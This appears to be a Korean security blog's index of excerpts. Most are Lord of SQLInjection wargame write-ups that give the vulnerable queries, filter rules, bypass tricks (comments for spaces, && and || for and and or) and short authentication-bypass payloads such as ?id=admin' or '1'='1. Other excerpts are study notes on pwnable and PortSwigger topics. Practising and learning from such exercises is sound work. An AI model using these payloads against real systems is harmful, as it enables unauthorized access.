Query select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}' Protection preg_match prob 문자열 _ . () ` ` (white space) addslashes() $_GET[pw] = addslashes($_GET[pw])...
[LOS] orge
Query select id from prob_orge where id='guest' and pw='{$_GET[pw]}' Protection preg_match prob 문자열 _ . () or and Analysis 공백 문자 대신 주석 /**/을 사용할 수 있다. Payload ?pw='...
[LOS] darkelf
Query select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}' Protection preg_match prob 문자열 _ . () or and Analysis and와 or 연산자 대신 &&, ||를 사용할 수 있다 ...
[LOS] orc
Query select id from prob_orc where id='admin' and pw='{$_GET[pw]}' Protection preg_match prob 문자열 _ . () addslashes() $_GET[pw] = addslashes($_GET[pw]); if statement if((...
[LOS] goblin
Query select id from prob_goblin where id='guest' and no={$_GET[no]} preg_match prob 문자열 _ . () ' " ` Payload ?no=0 or 1=1 order by id asc
[LOS] gremlin
Query select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}' preg_match prob 문자열 _ . () Payload ?id=asd' or 1=1 %23
[LOS] cobolt
Query select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}') preg_match prob 문자열 _ . () Payload ?id=admin' or '1'='1
[pwnable] System Hacking 노트
시스템 해킹을 공부하며 도움이 될 만한 내용을 계속해서 정리합니다. ELF 바이너리의 심볼 테이블(Symbol Table) ELF 바이너리에는 실행에 필요한 함수 및 변수의 주소를 저장하는 심볼 테이블(Symbole Table)이 포함되어 있다. pwntools pwntools...
[PortSwigger] Academy: Web Cache Deception
[PortSwigger Academy Web Cache Deception] 을 수강하고 정리하였습니다. #Web Caches 웹 캐시는 서버와 사용자 사이에 존재하는 시스템이다. 클라이언트가 정적 리소스를 요청하면, 요청은 가장 먼저 캐시로 향해진다. 만약 캐시가 리소스에 대한 카피가 없다면(Cache Miss), 요청은 응답하는 서...
[PortSwigger] Academy: WebSockets vulnerabilities
[PortSwigger Academy WebSockets vulnerabilities ] 을 수강하고 정리하였습니다. #WebSockets 웹 소켓은 현대 웹 애플리케이션에서 널리 사용된다. 이는 HTTP를 통해 시작되며 양방향 비동기 통신을 통해 오래동안 지속되는 연결을 제공한다. 웹 소켓은 사용자 동작을 수행하고 민감한 정보를 전...